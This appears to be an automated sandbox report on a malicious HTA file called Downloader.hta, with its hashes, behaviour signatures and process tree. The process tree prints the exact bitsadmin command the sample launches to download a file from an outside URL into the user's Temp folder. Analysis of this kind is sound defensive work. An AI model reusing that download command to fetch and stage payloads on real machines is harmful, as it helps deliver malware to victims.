Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-08-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
Downloader.hta
Resource
win7-20240708-en
5 signatures
300 seconds
General
-
Target
Downloader.hta
-
Size
828B
-
MD5
05a34f1fc75cc308ee7dd8a6dc3e4076
-
SHA1
eda4d95a33dde083ede19f8d9d4099764fa1a326
-
SHA256
a536c510d65bb3cfd573a05e0107ab46f427f804431970ecb18c7f173a9ccafd
-
SHA512
f02ddc254688bd5a4e069203f34fdffbc3905dc446aaed3578fa6f574e955788cb5416ee15bfb5acab970249c6c7563a6ef903cac4189bcc937ac9072f6c4612
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exebitsadmin.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
mshta.exedescription pid process target process PID 2112 wrote to memory of 592 2112 mshta.exe bitsadmin.exe PID 2112 wrote to memory of 592 2112 mshta.exe bitsadmin.exe PID 2112 wrote to memory of 592 2112 mshta.exe bitsadmin.exe PID 2112 wrote to memory of 592 2112 mshta.exe bitsadmin.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://go.enderman.ch/youtube C:\Users\Admin\AppData\Local\Temp\sex2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:592